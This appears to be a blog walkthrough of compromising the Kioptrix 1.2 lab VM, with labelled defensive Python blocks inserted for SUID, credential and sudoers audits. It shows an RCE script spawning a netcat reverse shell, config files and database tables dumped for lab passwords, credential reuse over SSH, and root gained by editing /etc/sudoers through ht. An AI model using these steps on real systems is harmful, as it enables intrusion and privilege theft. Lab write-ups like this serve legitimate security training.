Kioptrix 1.2 VM

This VM mainly exercises information-gathering skills. Exploiting the vulnerability to get a shell is fairly simple, and privilege escalation is not complicated either; what takes the most time is collecting useful information from the lowest-privilege shell. Some of what you find is useful and some is noise, and it has to be examined carefully to avoid falling into rabbit holes.

Information gathering

Web inspection

Following the hint on the VulnHub page, I first added the domain-to-IP mapping to the hosts file.

View the main page

This page has three clickable links, corresponding to blog, login and gallery.

Here we get the name of the CMS: LotusCMS.

The most valuable pieces of information are the CMS name and the login page.

Search for vulnerabilities in this CMS.

The first script is exploited through msf; let's try it.

It failed; off to Google.

There is indeed an exploitation method for this CMS, and judging by the VM's date it should correspond to this vulnerability.

Two files are provided, along with a demo video.

So download the sh file and run it. Only the usage given at the top of the file is listed here:

# USAGE: ./lotusRCE.sh target lotusCMS-path
# USAGE: ./lotusRCE.sh ki0ptrix3.com /
# USAGE: ./lotusRCE.sh 192.168.1.36 /lcms/
# Enter IP and PORT when asked to spawn netcat based reverse shell ;)

At first I tried typing NetCat /dev/tcp directly, but nothing happened; only after watching the video did I realize that you enter the option number here...

Reverse shell succeeded:

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.25.128] from (UNKNOWN) [192.168.25.130] 36437
whoami
www-data

Privilege escalation

Information gathering

Let's do a round of information gathering:

python -c "import pty;pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ sudo -l
sudo -l
[sudo] password for www-data:

www-data@Kioptrix3:/home/www/kioptrix3.com$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:82:a5:78 brd ff:ff:ff:ff:ff:ff
inet 192.168.25.130/24 brd 192.168.25.255 scope global eth1
inet6 fe80::20c:29ff:fe82:a578/64 scope link
valid_lft forever preferred_lft forever
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
www-data@Kioptrix3:/home/www/kioptrix3.com$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Kioptrix3:/home/www/kioptrix3.com$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
www-data@Kioptrix3:/home/www/kioptrix3.com$ sudo -l
sudo -l
[sudo] password for www-data:

www-data@Kioptrix3:/home/www/kioptrix3.com$

There is one unusual file, ht:

www-data@Kioptrix3:/home/www/kioptrix3.com$ find / -type f -perm -04000 -ls 2>/dev/null
<w/kioptrix3.com$ find / -type f -perm -04000 -ls 2>/dev/null
66011 8 -rwsr-xr-x 1 root root 4588 Aug 22 2008 /usr/lib/eject/dmcrypt-get-device
90114 172 -rwsr-xr-x 1 root root 168340 May 14 2008 /usr/lib/openssh/ssh-keysign
90491 12 -rwsr-xr-- 1 root www-data 10276 Jun 18 2009 /usr/lib/apache2/suexec
54187 12 -rwsr-xr-x 1 root root 9624 Jan 11 2011 /usr/lib/pt_chown
53422 12 -rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
53651 48 -rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
50857 20 -rwsr-xr-x 1 root root 19144 Dec 8 2008 /usr/bin/newgrp
51026 28 -rwsr-xr-x 1 root root 28624 Dec 8 2008 /usr/bin/chfn
51029 40 -rwsr-xr-x 1 root root 37360 Dec 8 2008 /usr/bin/gpasswd
52498 112 -rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudo
53212 40 -rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
52498 112 -rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudoedit
51027 24 -rwsr-xr-x 1 root root 23952 Dec 8 2008 /usr/bin/chsh
51030 32 -rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd
53424 16 -rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
58472 2028 -rwsr-sr-x 1 root root 2072344 Apr 16 2011 /usr/local/bin/ht
53710 268 -rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
52260 16 -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
582147 4 -rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
196704 20 -rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
196667 32 -rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
196644 84 -rwsr-xr-x 1 root root 81368 Sep 26 2008 /bin/mount
196645 68 -rwsr-xr-x 1 root root 63584 Sep 26 2008 /bin/umount
196668 28 -rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
196641 28 -rwsr-xr-x 1 root root 25540 Dec 8 2008 /bin/su

I looked around and found no way to exploit ht's SUID bit, so on with the information gathering.
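The SUID listing above is exactly what the defender of this host should be reviewing. As an added example (not code from the original post), the following Python script parses `find / -type f -perm -04000 -ls` output, compares it against a baseline recorded from a known-good build, and flags files outside package-managed directories or carrying both the setuid and setgid bits for root. The sample input is a subset of the listing in this post; the baseline set and the directory list are constructed assumptions.

```python
import re
from typing import NamedTuple

# Sample input: a subset of the `find / -type f -perm -04000 -ls` output
# captured in this walkthrough (enough entries to exercise every check).
FIND_LS_OUTPUT = """\
66011 8 -rwsr-xr-x 1 root root 4588 Aug 22 2008 /usr/lib/eject/dmcrypt-get-device
52498 112 -rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudo
53212 40 -rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
51030 32 -rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd
58472 2028 -rwsr-sr-x 1 root root 2072344 Apr 16 2011 /usr/local/bin/ht
196641 28 -rwsr-xr-x 1 root root 25540 Dec 8 2008 /bin/su
"""

# Constructed baseline: the setuid paths recorded when the host was built.
# In practice, generate it once from a clean image and keep it with the
# host's configuration management data.
BASELINE = {
    "/usr/lib/eject/dmcrypt-get-device", "/usr/bin/sudo", "/usr/bin/at",
    "/usr/bin/passwd", "/bin/su",
}

# Directories a package manager normally installs into (assumed list). A
# setuid file anywhere else (/usr/local, /opt, /home, /tmp, ...) was placed
# by hand and deserves an explanation.
PACKAGE_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/lib/")


class SuidEntry(NamedTuple):
    mode: str
    owner: str
    group: str
    path: str


# `find -ls` prints: inode blocks mode links owner group size month day year path
LINE_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(\S{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(/\S+)"
)


def parse_find_ls(text):
    """Parse `find -ls` lines into SuidEntry records; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(SuidEntry(*m.groups()))
    return entries


def audit_suid(entries, baseline):
    """Return {path: [reasons]} for every entry that needs a second look."""
    findings = {}
    for e in entries:
        reasons = []
        if e.path not in baseline:
            reasons.append("not in baseline")
        if not e.path.startswith(PACKAGE_DIRS):
            reasons.append("outside package-managed directories")
        setuid = e.mode[3] in "sS"   # owner execute position carries the setuid flag
        setgid = e.mode[6] in "sS"   # group execute position carries the setgid flag
        if setuid and setgid and e.owner == "root":
            reasons.append("setuid and setgid root")
        if e.mode[8] == "w":         # anyone could replace code that runs as the owner
            reasons.append("world-writable")
        if reasons:
            findings[e.path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit_suid(parse_find_ls(FIND_LS_OUTPUT), BASELINE).items():
        print(f"{path}: {', '.join(reasons)}")
```

Run against a live host, the script would take the real `find` output on stdin and the baseline from a file; on the sample above it reports only `/usr/local/bin/ht`, for all three reasons. A file that is setuid and setgid root, hand-installed under /usr/local, is the kind of entry a periodic integrity check should page someone about.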

www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Nothing gained from the scheduled tasks; let's wander around and look.

www-data@Kioptrix3:/home/www/kioptrix3.com/data$ ls -liah
ls -liah
total 36K
631216 drwxrwxrwx 8 root root 4.0K Apr 14 2011 .
630792 drwxr-xr-x 8 root root 4.0K Apr 15 2011 ..
631217 -rwxrwxrwx 1 root root 13 Apr 1 2006 .htaccess
631218 drwxrwxrwx 3 root root 4.0K Apr 14 2011 config
631229 drwxrwxrwx 2 root root 4.0K Apr 14 2011 filebackups
631231 drwxrwxrwx 2 root root 4.0K Apr 14 2011 files
631233 -rwxrwxrwx 1 root root 0 Apr 11 2010 index.php
631234 drwxrwxrwx 10 root root 4.0K Apr 14 2011 modules
631266 drwxrwxrwx 2 root root 4.0K Apr 14 2011 pages
631269 drwxrwxrwx 2 root root 4.0K Apr 14 2011 users
www-data@Kioptrix3:/home/www/kioptrix3.com/data$ cd config
cd config
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ ls -liah
ls -liah
total 36K
631218 drwxrwxrwx 3 root root 4.0K Apr 14 2011 .
631216 drwxrwxrwx 8 root root 4.0K Apr 14 2011 ..
631219 -rwxrwxrwx 1 root root 4 Oct 2 2010 active_design.dat
631220 -rwxrwxrwx 1 root root 0 Apr 11 2010 index.php
631221 drwxrwxrwx 2 root root 4.0K Apr 14 2011 modules
631224 -rwxrwxrwx 1 root root 30 Apr 14 2011 salt.dat
631225 -rwxrwxrwx 1 root root 21 Oct 2 2010 site_description.dat
631226 -rwxrwxrwx 1 root root 8 Oct 2 2010 site_keywords.dat
631227 -rwxrwxrwx 1 root root 15 Apr 14 2011 site_title.dat
631228 -rwxrwxrwx 1 root root 5 Mar 14 2011 site_version.dat

There are some interesting files here; let's look at them one by one.

www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ ls
ls
active_design.dat modules site_description.dat site_title.dat
index.php salt.dat site_keywords.dat site_version.dat
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat salt.dat
cat salt.dat
gtZBO2PewhZHR10hGXLaSt0Bc5Ub73
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat site_description.dat
<w/kioptrix3.com/data/config$ cat site_description.dat
Your Site Description
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat site_keywords.dat
cat site_keywords.dat
LotusCMS
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat index.php
cat index.php
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat active_design.dat
cat active_design.dat
grey
www-data@Kioptrix3:/home/www/kioptrix3.com/data/config$ cat site_version.dat
cat site_version.dat
3.0.5

First, this confirms the LotusCMS version (we are already in, so the version number is not of much use anymore); second, we obtained the salt, which may come in handy later.

www-data@Kioptrix3:/home/www/kioptrix3.com/data$ cd users
cd users
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ ls -liah
ls -liah
total 12K
631269 drwxrwxrwx 2 root root 4.0K Apr 14 2011 .
631216 drwxrwxrwx 8 root root 4.0K Apr 14 2011 ..
631270 -rw-r--r-- 1 www-data www-data 67 Apr 15 2011 admin.dat
631271 -rwxrwxrwx 1 root root 0 Apr 11 2010 index.php
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ cat admin.dat
cat admin.dat
|318d8dd409db395f0317efa71b3bad13e1fb9857|administrator|bla@bla.com
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ cat index.php
cat index.php
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$

admin.dat contains the password (as a hash); cracking it with online sites failed. Maybe try cracking it locally?

Let's keep gathering information.

www-data@Kioptrix3:/home/www/kioptrix3.com$ ls gallery
ls gallery
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat ./gallery/gconfig.php
cat ./gallery/gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>

Got the database username and password; log in to MySQL.

www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery
use gallery
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from gallarific_users
select * from gallarific_users
-> ;
;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)

mysql> select * from dev_accounts
select * from dev_accounts
-> ;
;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.01 sec)

Found quite a few things... Trying to log in to the admin panel as admin failed, and logging in with the two users below failed too. Trying SSH: admin failed, loneferret succeeded.

Login succeeded as well.
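What made this pivot possible is how credentials were stored on the host: the MySQL root password in plaintext in gconfig.php, a plaintext password in gallarific_users, 32-hex-character digests (MD5-sized, no per-user salt stored alongside) in dev_accounts, one of which let the author log in as loneferret over SSH, and a 40-hex-character digest with a single site-wide salt.dat for the LotusCMS administrator. As an added example (not code from the post, from LotusCMS or from Gallarific), the following Python classifies stored credential values by their shape so a review can find the weak formats, and shows per-user salted, iterated PBKDF2 storage from the standard library as the replacement. The sample rows are taken from the dumps above; the function names, the format string and the iteration count are assumptions.

```python
import hashlib
import hmac
import os
import re

# Sample rows taken from the dumps in this walkthrough: (username, stored value).
SAMPLE_ROWS = [
    ("admin", "n0t7t1k4"),                                          # gallarific_users
    ("dreg", "0d3eccfb887aabd50f243b3f155c0f85"),                   # dev_accounts
    ("loneferret", "5badcaf789d3d1d09794d8f021f40f0e"),             # dev_accounts
    ("administrator", "318d8dd409db395f0317efa71b3bad13e1fb9857"),  # LotusCMS admin.dat
]

HEX_RE = re.compile(r"^[0-9a-f]+$")


def classify_stored_value(value):
    """Guess the storage format from its shape alone. Anything other than a
    salted, iterated KDF string should be scheduled for migration."""
    if value.startswith("pbkdf2_sha256$"):
        return "pbkdf2 (salted, iterated)"
    if HEX_RE.match(value):
        by_len = {
            32: "md5-sized hex (unsalted fast hash)",
            40: "sha1-sized hex (fast hash, site-wide salt at best)",
            64: "sha256-sized hex (fast hash)",
        }
        return by_len.get(len(value), "hex digest of unknown size")
    return "plaintext"


ITERATIONS = 600_000  # assumption: tune so one verification costs ~100 ms on the target hardware


def hash_password(password, salt=None):
    """Per-user random salt plus iterated PBKDF2-HMAC-SHA256, stored as one string."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def review(rows):
    """Map each username to the verdict on how its credential is stored."""
    return {user: classify_stored_value(value) for user, value in rows}


if __name__ == "__main__":
    for user, verdict in review(SAMPLE_ROWS).items():
        print(f"{user:14} {verdict}")
    stored = hash_password("correct horse battery staple")
    print(classify_stored_value(stored), verify_password("correct horse battery staple", stored))
```

Two further points follow from the dumps rather than from the code: the web application should connect with a dedicated, least-privilege database account rather than root, and passwords for OS accounts should never be the same as those kept in an application table, because whoever reads the table gets SSH for free.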

Privilege escalation via the ht editor

Checking the current user's permissions shows that ht can be run with root privileges, and the hint tells us that ht is a software editor.

apt install terminal.app  # I installed terminal.app here to make use of it

terminal # run it

A blue interface appears; press F3, type /etc/sudoers and press Enter.

Add the content shown in the figure, then press F2 to save and Ctrl+C to exit.

Check the user's permissions again: the entry has been added successfully, and running it through sudo gives root.
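The escalation works because sudo allows the user to run an editor as root, and an editor can write any file, including /etc/sudoers itself. The post does not reproduce the `sudo -l` output, so the rules below are constructed. As an added example (not from the post), the following Python reads sudoers-style user specifications and flags commands that are editors or general file-writing tools (which make the grant equivalent to ALL) and NOPASSWD grants; the program list, the parsing rules and the sample file are assumptions, and the parser covers only the plain `user host=(runas) commands` form, not aliases or included files.

```python
import re

# Constructed sudoers excerpt for the demonstration (not the VM's real file).
SUDOERS_SAMPLE = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
alice   ALL=(ALL) NOPASSWD: /usr/local/bin/ht
bob     ALL=(ALL) /usr/bin/vim, /usr/bin/systemctl restart nginx
carol   ALL=(ALL) NOPASSWD: /usr/sbin/service apache2 restart
dave    ALL=(ALL) !/usr/bin/su, /usr/bin/less
"""

# Programs that can write an arbitrary file or drop to a shell once running
# as root; granting any of them is effectively granting ALL. Assumed list.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "tee", "cp", "mv", "dd"}

# user  host=(runas) command[, command...]   (runas group is optional)
RULE_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")


def parse_sudoers(text):
    """Return (user, hosts, runas, [commands]) for each user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                                # aliases, includes: out of scope here
        user, hosts, runas, cmd_list = m.groups()
        cmds = [c.strip() for c in cmd_list.split(",") if c.strip()]
        rules.append((user, hosts, runas or "root", cmds))
    return rules


def audit_sudoers(rules):
    """Return a list of (user, command, reason) findings."""
    findings = []
    for user, _hosts, _runas, cmds in rules:
        nopasswd = False
        for cmd in cmds:
            tags, _, command = cmd.rpartition(":")
            if "NOPASSWD" in tags.split():          # a tag applies to the rest of the list
                nopasswd = True
            command = command.strip()
            if command == "ALL":
                continue                            # unrestricted grants are reviewed separately
            negated = command.startswith("!")
            prog = command.lstrip("!").split()[0].rsplit("/", 1)[-1]
            if not negated and prog in FILE_EDITORS:
                findings.append((user, command, "editor/file tool runs as root: equivalent to ALL"))
            if not negated and nopasswd:
                findings.append((user, command, "NOPASSWD: no credential needed after account compromise"))
    return findings


if __name__ == "__main__":
    for user, command, reason in audit_sudoers(parse_sudoers(SUDOERS_SAMPLE)):
        print(f"{user:8} {command:40} {reason}")
```

The fix for a flagged entry is to grant the narrow action the user actually needs (a specific script or a `systemctl restart` of one unit) rather than an interactive program, and to keep the `!` exclusion pattern out of sudoers entirely: excluding su while allowing an editor, as in the constructed dave entry, blocks nothing.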


https://i3eg1nner.github.io/2023/05/3ec3f9289747.html
Author: I3eg1nner
Published: 25 May 2023